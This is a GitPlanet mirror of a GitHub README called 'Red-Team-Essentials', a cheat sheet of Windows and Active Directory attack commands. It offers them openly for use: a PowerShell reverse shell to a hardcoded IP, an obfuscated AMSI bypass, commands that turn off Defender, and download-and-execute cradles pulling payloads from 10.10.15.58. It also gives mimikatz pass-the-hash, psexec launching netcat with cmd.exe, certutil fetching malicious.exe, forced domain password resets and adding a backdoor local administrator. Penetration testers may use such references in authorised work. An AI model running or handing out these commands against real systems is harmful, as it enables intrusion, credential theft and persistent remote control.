GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → hexachordanu → Red-Team-Essentials

hexachordanu / Red-Team-Essentials

Licence: other
This repo will contain some basic pentest/RT commands.

Programming Languages

powershell
5483 projects

Labels

cybersecuritypentestingred-teamred-team-engagement

Projects that are alternatives of or similar to Red-Team-Essentials

Bigbountyrecon
BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation.
Stars: ✭ 541 (+2359.09%)
Mutual labels:  cybersecurity, pentesting, red-team
Sherlock
This script is designed to help expedite a web application assessment by automating some of the assessment steps (e.g., running nmap, sublist3r, metasploit, etc.)
Stars: ✭ 36 (+63.64%)
Mutual labels:  cybersecurity, red-team, red-team-engagement
Thecollective
The Collective. A repo for a collection of red-team projects found mostly on Github.
Stars: ✭ 85 (+286.36%)
Mutual labels:  cybersecurity, pentesting, red-team
Hack Tools
The all-in-one Red Team extension for Web Pentester 🛠
Stars: ✭ 2,750 (+12400%)
Mutual labels:  cybersecurity, pentesting, red-team
awesome-list-of-secrets-in-environment-variables
🦄🔒 Awesome list of secrets in environment variables 🖥️
Stars: ✭ 538 (+2345.45%)
Mutual labels:  cybersecurity, pentesting, red-team
linux-rootkits-red-blue-teams
Linux Rootkits (4.x Kernel)
Stars: ✭ 56 (+154.55%)
Mutual labels:  pentesting, red-team
Oscp Cheat Sheet
This is my OSCP cheat sheet made by combining a lot of different resources online with a little bit of tweaking. I used this cheat sheet during my exam (Fri, 13 Sep 2019) and during the labs. I can proudly say it helped me pass so I hope it can help you as well ! Good Luck and Try Harder
Stars: ✭ 216 (+881.82%)
Mutual labels:  cybersecurity, pentesting
InlineWhispers2
Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2
Stars: ✭ 156 (+609.09%)
Mutual labels:  red-team, red-team-engagement
ReversePowerShell
Functions that can be used to gain Reverse Shells with PowerShell
Stars: ✭ 48 (+118.18%)
Mutual labels:  cybersecurity, red-team
Jwtcat
A CPU-based JSON Web Token (JWT) cracker and - to some extent - scanner.
Stars: ✭ 181 (+722.73%)
Mutual labels:  cybersecurity, pentesting
github-watchman
Monitoring GitHub for sensitive data shared publicly
Stars: ✭ 60 (+172.73%)
Mutual labels:  cybersecurity, red-team
wifi-deauther
A fully automatic wifi deauther coded in Python
Stars: ✭ 25 (+13.64%)
Mutual labels:  cybersecurity, pentesting
Betterbackdoor
A backdoor with a multitude of features.
Stars: ✭ 195 (+786.36%)
Mutual labels:  cybersecurity, pentesting
Satellite
easy-to-use payload hosting
Stars: ✭ 193 (+777.27%)
Mutual labels:  cybersecurity, red-team
Caldera
Automated Adversary Emulation Platform
Stars: ✭ 3,126 (+14109.09%)
Mutual labels:  cybersecurity, red-team
LAZYPARIAH
A tool for generating reverse shell payloads on the fly.
Stars: ✭ 121 (+450%)
Mutual labels:  cybersecurity, red-team
dorothy
Dorothy is a tool to test security monitoring and detection for Okta environments
Stars: ✭ 85 (+286.36%)
Mutual labels:  cybersecurity, red-team
CTF-Writeups
Repository of my CTF writeups
Stars: ✭ 25 (+13.64%)
Mutual labels:  cybersecurity, pentesting
Oscp Pentest Methodologies
备考 OSCP 的各种干货资料/渗透测试干货资料
Stars: ✭ 166 (+654.55%)
Mutual labels:  cybersecurity, pentesting
Docker Security Images
🔐 Docker Container for Penetration Testing & Security
Stars: ✭ 172 (+681.82%)
Mutual labels:  cybersecurity, pentesting
View All Similar Projects ➔

Red-Team-Essentials

Disable Defender

Set-MpPreference -DisableRealtimeMonitoring $true

Services and startname

 Get-WmiObject win32_service | format-Table name, startname, startmode

Fore-Change PAssword - generic All

Set-DomainObjectOwner -Identity stgadm -OwnerIdentity hexninja
Add-DomainObjectAcl -TargetIdentity stgadm -PrincipalIdentity hexninja
$newpass = ConvertTo-SecureString -String 'Password123! -AsPlainText -Force
Set-DomainUserPassword -Identity stgadm -AccountPassword $newpass

Powershell Reverse Shell one Liner (AMSI Bypass)

$ip='192.168.1.114';$port=1337;$client = New-Object System.Net.Sockets.TCPClient -ArgumentList $ip, $port;$s = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};$l = "lol";Set-alias $l ([char]105 + [char]101 + [char]120);while(($i = $s.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (lol $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$s.Write($sendbyte,0,$sendbyte.Length);$s.Flush()};$client.Close()

Powershell Download in V4 and V5

 Invoke-WebRequest "http://10.10.15.58/hex.ps1" -OutFile "C:\Windows\TEMP\hex.ps1"

Ptt using mimikatz

Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:xyz.local /ntlm:ce03434e2f83b99704a631ae56e2146e /run:powershell.exe"'

psexec

./ps.exe \\\localip -h -accepteula -u username -p password cmd /c 'C:\nc.exe 192.168.50.138 4444 -e cmd.exe'

Check Powershell Version

 $PSVersionTable.PSVersion

Download File Powershell V2

(New-Object Net.WebClient).DownloadFile('http://10.10.15.58/powerview.ps1', 'C:\users\someuser\Desktop\powerview.ps1')

Download Execute Powershell One Liner

powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.58/payload.ps1')

AMSI Bypass

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Execute this on target machine if you get rdesktop's Cred SSP Error while using remotedesktop

 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Remote desktop login through domain user credentials

xfreerdp /u:username /d:adcorp.local /p:"passwordxyz" /v:TARGETIP

Download Execute powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.10.15.58/payload.ps1')|iex"

Pivoting using sshutle when you have rsa keys

sshuttle -r root@TARGETIP -e "ssh -i rsa" TARGETIPRANGE.0/24

Adding user on windows cmd line & adding it to local admin group

net user hexninja lolbr654$@123 /ADD
net localgroup administrators hexninja /ADD

CertUtil Download remote file

certutil.exe -urlcache -f http://yourip/malicious.exe malicious.exe

CertUtil decode base64

certutil -decode malexecbase.b64 malexecutable.exe

regsvr32 to execute malcious dll

regsvr32 /s /u .\exploit.dll

Net1 (you read it right; it's not net) - available functions similar to net

Net1 localgroup administrators
Net1 users

Where utility to search for config files and everything

Examples:
    WHERE /?
    WHERE myfilename1 myfile????.*
    WHERE $windir:*.*
    WHERE /R c:\windows *.exe *.dll *.bat
    WHERE /Q ??.???
    WHERE "c:\windows;c:\windows\system32:*.dll"
    WHERE /F /T *.dll
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].